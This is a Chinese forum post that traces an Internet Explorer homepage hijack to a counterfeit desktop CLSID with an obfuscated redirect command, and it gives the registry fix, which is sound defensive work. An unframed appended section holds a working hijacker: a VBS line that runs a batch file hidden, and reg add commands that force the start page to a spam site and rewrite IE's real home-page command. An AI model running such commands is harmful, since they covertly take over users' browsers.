恶意首页追踪之旅
(先说下,360无法修复这个恶意首页)

话说,今天下了个扫站的工具,结果一不小心中了恶意广告!

中招后不停的乱下东西安装,360不停的在那弹出提示!

无语了,一个个卸载,把C:\windows\svchost.exe 和 svcho.exe 删除,然后打上免疫!

可是打开IE就傻了,以前主页明明是hao123(呵呵,还是习惯导航老祖宗),打开却跳到了一个垃圾导航
http://06000.cn/xy.htm,这种恶意修改,看到就烦!

打开属性看主页,没问题啊..就是 hao123 !

懒的手动改,用360修复首页试了试,汗一个   ,没反应,看来只得动手了!

右键IE图标,点"属性"的确弹出的是设置属性对话框,而并非是个快捷方式传参式冒充,而且
主页就是hao123!

在注册表中搜 http://06000.cn/xy.htm 没有相关结果

再打开IE看看, 发现有跳转 先是 http://g1476.cn 然后才跳到 http://06000.cn/xy.htm

好,那就搜 g1476.cn

还是没结果!

MS还有点棘手, 打开桌面自定义,发现IE并未打勾,然后就打上勾保存,发现桌面多出了一个IE图标

还真是山寨,而且是仿真版的,平常都是个快捷方式,这回还出新花招了!

(右键点这个山寨IE, 菜单中有删除, 但删除没一点反应)

顺便说一下,桌面的 "我的电脑","回收站","IE" 并非是文件或文件夹(dir一下"%userprofile%\桌面"就知道了),
而是桌面特殊项,每一个都对应一个类标识符,相关信息存在注册表中!

定位到 桌面的特殊项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID
瞅了下,没什么变化!

再定位到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

问题出来了: {3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 这个好陌生

虽然桌面的特殊项没能力记忆下来,但是这个开头的{3D3D 一点印象都没

打开它的值,发现是 Internet Explorer

??? 难道记错了?

看来得确认一下IE的类标识到底是多少,把真正的IE名字改成Internet Explorers,
注册表中搜索新IE名字--Internet Explorers,

定位到了的真正的类标识符是 {871C5380-42A0-1069-A2EA-08002B30309D}

确定了,那个{3D3D..还真是高仿山寨!

到此,还不死心,还得看看它到底是怎么隐蔽修改我的IE首页:

到 HKEY_CLASSES_ROOT\CLSID 搜索{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45}

出来了:

DefaultIcon 对应的IE图标项
shell\D\command 对应菜单中的删除选项(关联的程序是Rundll32.exe,没传参,这就是在在桌面右键删除山寨IE无效
的原因啦)
属性(&R) 对应的就是IE设置对话框 其值 为Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl
(就是打开IE设置的对话框了)
ShellFolder  里设定它的属性

open 这就是IE被窜改的根源了,它的 command值为

C:\Program Files\Internet Explorer\iexplore.exe %1 h%t%t%p%:%/%/%g%11%14%17%16%.%c%n%

好晕,又是这种密文,把%1 和%去掉 后就是恶意首页了 http://g1476.cn 大家可别上,小心中招!

到此,恶意修改的根源就抓到了!

解决方法:

搜索注册表,删除搜到的{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 全部信息 即可!

首页被恶意窜改的手段很多...有时候工具也会失效,还得靠自己的双手!转载请注明出自饭客安全论坛 -  http://bbs.hackfans.com.cn/,本贴地址:http://bbs.hackfans.com.cn/viewthread.php?tid=45933

=====================================================================================

IE修改器

dat文件
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\home.cmd", 0, TRUE)

COM文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.2255.net/?ysd222" /f

注册表-恶意首页追踪之旅(IE不能改主页)的更多相关文章

  1. 注册表 锁IE首页

    用附件中的修改软件,或者用以下修改注册表的办法.   一.注册表被修改的原因及解决办法 其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果. ...

  2. 详解Windows注册表分析取证

    大多数都知道windows系统中有个叫注册表的东西,但却很少有人会去深入的了解它的作用以及如何对它进行操作.然而对于计算机取证人员来说注册表无疑是块巨大的宝藏.通过注册表取证人员能分析出系统发生了什么 ...

  3. c#_自动化测试 (五) 读写64位操作系统的注册表

    非Web程序(桌面程序)的设置一般都存在注册表中. 给这些程序做自动化测试时, 需要经常要跟注册表打交道. 通过修改注册表来修改程序的设置. 本章介绍如何利用C#程序如何操作注册表, 特别是如何操作6 ...

  4. Delphi在win7/vista下写注册表等需要管理员权限的解决方案

    看到论坛好多人问win7下写注册表的问题,我结合自己的理解写了一点东西,首先声明一下,本人初学Delphi,水平有限,大家见笑了,有什么不对之处请老鸟多指点. [背景]win7/Vista提供的UAC ...

  5. SetCookies, cookie规范注册表和cookie存储将会优先于设置在HTTP客户端级别中默认的那些

    遇到下面问题解决方法: Hey? 404 抱歉,你输入的网址可能不正确,或者该网页不存在. 7 秒后返回首页 使用独立的本地执行上下文来实现对每个用户(或每个线程)状态的管理. 定义在本地内容中的co ...

  6. [转帖]Windows注册表内容详解

    Windows注册表内容详解 来源:http://blog.sina.com.cn/s/blog_4d41e2690100q33v.html 对 windows注册表一知半解 不是很清晰 这里学习一下 ...

  7. 入侵检测中需要监控的注册表路径研究(Windows Registry Security Check)

    1. Windows注册表简介 注册表(Registry,繁体中文版Windows称之为登录档)是Microsoft Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息.早在Wind ...

  8. Window权限维持(一):注册表运行键

    在红队行动中在网络中获得最初的立足点是一项耗时的任务.因此,持久性是红队成功运作的关键,这将使团队能够专注于目标,而不会失去与指挥和控制服务器的通信.在Windows登录期间创建将执行任意负载的注册表 ...

  9. Ruby Rails学习中:注册表单,注册失败,注册成功

    接上篇 一. 注册表单 用户资料页面已经可以访问了, 但内容还不完整.下面我们要为网站创建一个注册表单. 1.使用 form_for 注册页面的核心是一个表单, 用于提交注册相关的信息(名字.电子邮件 ...

随机推荐

  1. 一步步学习NHibernate(7)——HQL查询(1)

    请注明转载地址:http://www.cnblogs.com/arhat 从本章开始,老魏带着大家来学习一下HQL语句.HQL语句NHibernate为我们提供的一种功能比较强大的查询语句,这个HQL ...

  2. C++的构造函数和析构函数

    1.构造函数和析构函数为什么没有返回值? 构造函数和析构函数是两个非常特殊的函数:它们没有返回值.这与返回值为void的函数显然不同,后者虽然也不返回任何值,但还可以让它做点别的事情,而构造函数和析构 ...

  3. Spring 数据源配置一:单一数据源

    最近遇到一个项目,需要访问都多个数据源,并且数据库是不同厂商(mysql,  sqlserver). 所以对此做了一些研究,这里咱们采用渐进的方式来展开,先谈谈单一数据源配置.(稍后有时间会陆续补充其 ...

  4. ZOJ 2750 Idiomatic Phrases Game(Dijkstra)

    点我看题目 题意 : 给定一本字典,字典里有很多成语,要求从字典里的第一个成语开始,运用字典里的成语变到最后一个成语,变得过程就是成语接龙,后一个成语的第一个字必须有前一个成语的最后一个字相等,给定的 ...

  5. C语言中随机数的生成

    刚好在找这方面的资料,看到了一片不错的,就全文转过来了,省的我以后再找找不到. 在C语言中,可以通过rand函数得到一个“伪随机数”.这个数是一个整数,其值大于等于0且小于等于RAND_MAX.ran ...

  6. 李洪强漫谈iOS开发[C语言-016]-变量的作用域

  7. servlet向ajax传递list数据类型,ajax向servlet传递array数据类型

    因工作需要, 1,后台向前台传递一个list 2,前台向后台传递类似于list的结构,但是因为javascript不支持list类型,所以只能使用二维数组代替 后台运行后的截图:           ...

  8. 4. 在Inspector面板中显示类中变量+ 拓展编辑器

    1. C#脚本如下: using UnityEngine; using System.Collections; public class MyTest : MonoBehaviour { ; ; [S ...

  9. Dojo Widget系统(转)

    Dojo 里所有的小部件(Widget)都会直接或间接的继承 dijit._Widget / dijit._WidgetBase dijit._Widget 是 dojo 1.6 和 1.6之前的版本 ...

  10. 教程 打造OS X Mavericks原版 EFI Clover 引导安装

    自从 Mavericks 10.9 发布DP版到现在的GM版以来,以前Clover引导原版InstallESD.dmg方式安装原版的方法已经不能使用,而且已经不能引导安装了,所以从GM版发布以前,终于 ...